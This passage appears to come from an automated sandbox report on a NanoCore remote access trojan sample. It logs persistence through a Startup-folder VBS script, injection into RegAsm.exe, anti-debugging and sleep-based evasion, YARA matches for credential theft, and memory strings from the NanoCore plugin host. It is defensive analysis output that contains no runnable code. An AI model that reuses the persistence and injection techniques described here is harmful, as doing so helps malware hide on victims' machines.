      Source: 12.0.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 12.0.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe File created: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe

      Boot Survival

      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs

      Hooking and other Techniques for Hiding and Protection

      Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon (4).png
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4368Thread sleep time: -14757395258967632s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe TID: 5928Thread sleep time: -31025s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6332Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 6505Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2973Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1009Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_002651DA FindFirstFileExA,0_2_002651DA
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB51DA FindFirstFileExA,7_2_00AB51DA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeThread delayed: delay time: 31025Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: RegAsm.exe, 00000003.00000002.510037415.0000000001195000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/&3OH,
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00262598 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00262598
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00267394 GetProcessHeap,0_2_00267394
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00263E41 mov eax, dword ptr fs:[00000030h]0_2_00263E41
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00D04405 mov eax, dword ptr fs:[00000030h]0_2_00D04405
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00D04135 mov edx, dword ptr fs:[00000030h]0_2_00D04135
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00D043A5 mov eax, dword ptr fs:[00000030h]0_2_00D043A5
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB3E41 mov eax, dword ptr fs:[00000030h]7_2_00AB3E41
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_010D4135 mov edx, dword ptr fs:[00000030h]7_2_010D4135
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_010D4405 mov eax, dword ptr fs:[00000030h]7_2_010D4405
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_010D43A5 mov eax, dword ptr fs:[00000030h]7_2_010D43A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_002626FA SetUnhandledExceptionFilter,0_2_002626FA
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00262598 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00262598
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00264D99 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00264D99
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_002629CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002629CC
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB26FA SetUnhandledExceptionFilter,7_2_00AB26FA
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB4D99 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00AB4D99
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB2598 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00AB2598
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB29CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00AB29CC

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe -- Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe -- Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D72008
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F1E008
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe"
      Source: C:\Windows\System32\wscript.exe -- Process created: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Source: RegAsm.exe, 00000003.00000002.510432918.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.511284047.00000000031D4000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Program Managerh
      Source: RegAsm.exe, 00000003.00000002.510432918.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.514013008.0000000006D3E000.00000004.00000010.00020000.00000000.sdmp -- Binary or memory string: Program Manager
      Source: RegAsm.exe, 00000003.00000002.510432918.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.511284047.00000000031D4000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Program ManagerL
      Source: RegAsm.exe, 00000003.00000002.510052393.00000000012AD000.00000004.00000010.00020000.00000000.sdmp -- Binary or memory string: Program Manager h
      Source: RegAsm.exe, 00000003.00000002.510432918.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.511284047.00000000031D4000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Program Managerx
      Source: RegAsm.exe, 00000003.00000002.513862048.00000000062BD000.00000004.00000010.00020000.00000000.sdmp -- Binary or memory string: 'lProgram Manager
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe -- Code function: 0_2_0026280B cpuid
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe -- Code function: 0_2_00262484 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter

      Stealing of Sensitive Information

      Source: Yara match -- File source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTR
      Source: Yara match -- File source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTR
      Source: Yara match -- File source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTR
      Source: Yara match -- File source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTR

      Remote Access Functionality

      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp -- String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp -- String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp -- String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp -- String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegAsm.exe, 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp -- String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp -- String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: ople.exe.exe, 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp -- String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp -- String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp -- String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp -- String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegAsm.exe, 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp -- String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp -- String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRunti